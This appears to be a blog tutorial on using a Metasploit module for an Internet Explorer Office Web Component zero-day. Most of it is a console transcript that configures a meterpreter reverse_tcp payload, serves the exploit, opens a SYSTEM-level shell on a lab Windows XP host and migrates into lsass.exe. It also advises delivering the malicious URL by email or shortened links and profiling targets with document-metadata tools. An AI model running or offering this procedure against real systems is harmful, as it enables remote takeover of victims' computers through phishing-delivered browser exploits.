HD Moore has released a second IE 0 day Metasploit Exploit Module in the past 2 weeks. The Office Web Component Exploit in Metasploit was committed to the Dev 3.3 SVN and will attack the vulnerability on the following platforms:
- Windows XP SP0 to SP3 with IE6 or IE7 with Office XP or Office 2003 Installed
The exploit targets a specific spreadsheet component in ActiveX. The code for the whole exploit can be seen in trac.metasploit.com.
To use the exploit we must load it in msfconsole, for this example the console will be ran as root since we want to use port 80 for the exploit handler to listen on. This will ensure success by using the default port 80 for directed attacks as there might be filtering on the target network. We set the exploit and payload:
carlos@loki:~/svn/msf3-dev$ sudo ./msfconsole[sudo] password for carlos:_| | o_ _ _ _ _|_ __, , _ | | __ _|_/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| || | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_//|\|=[ msf v3.3-dev+ -- --=[ 384 exploits - 261 payloads+ -- --=[ 20 encoders - 7 nops=[ 166 auxmsf > use exploit/windows/browser/owc_spreadsheet_msdsomsf exploit(owc_spreadsheet_msdso) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpmsf exploit(owc_spreadsheet_msdso) > set LHOST 192.168.1.158LHOST => 192.168.1.158
Know we take a look at the other options we have available for this module and we change the port to listen on to 80:msf exploit(owc_spreadsheet_msdso) > show optionsModule options:Name Current Setting Required Description---- --------------- -------- -----------SRVHOST 0.0.0.0 yes The local host to listen on.SRVPORT 8080 yes The local port to listen on.SSL false no Use SSLURIPATH no The URI to use for this exploit (default is random)Payload options (windows/meterpreter/reverse_tcp):Name Current Setting Required Description---- --------------- -------- -----------EXITFUNC process yes Exit technique: seh, thread, processLHOST 192.168.1.158 yes The local addressLPORT 4444 yes The local portExploit target:Id Name-- ----0 Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0msf exploit(owc_spreadsheet_msdso) > set SRVPORT 80SRVPORT => 80
We know launch the exploit and make sure no errors are reported:msf exploit(owc_spreadsheet_msdso) > exploit[*] Exploit running as background job.msf exploit(owc_spreadsheet_msdso) >[*] Handler binding to LHOST 0.0.0.0[*] Started reverse handler[*] Using URL: http://0.0.0.0:80/4fwmCRO[*] Local IP: http://192.168.1.158:80/4fwmCRO[*] Server started.
We can now send and email, tweet with URL shortened or any other method od delivery of the address to the target. Once the exploit is run we must quickly migrate off the process since IE will hang or a user might kill the process destroying our shell:[*] Sending Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption to 192.168.1.139:1067...[*] Transmitting intermediate stager for over-sized stage...(216 bytes)[*] Sending stage (718336 bytes)[*] Meterpreter session 1 opened (192.168.1.158:4444 -> 192.168.1.139:1068)msf exploit(owc_spreadsheet_msdso) > sessions -i 1[*] Starting interaction with 1...meterpreter > run migrate[*] Migrating to lsass.exe...[*] Current server process: iexplore.exe (1328)[*] New server process: lsass.exe (684)meterpreter >meterpreter > sysinfoComputer: WINXPLAB01OS : Windows XP (Build 2600, Service Pack 2).meterpreter > getuidServer username: NT AUTHORITY\SYSTEMmeterpreter >
This exploit should be launched after the enumeration of the target network, preferably using metadata on documents using tools like FOCA or Metagoofil to detect the Office and OS to create the files and with this information target the attack.
UPDATE: Removed the section where we covered how the code obfuscation worked since HD updated the exploit and mentioned that is was having problems with the encoding. Changeset for the code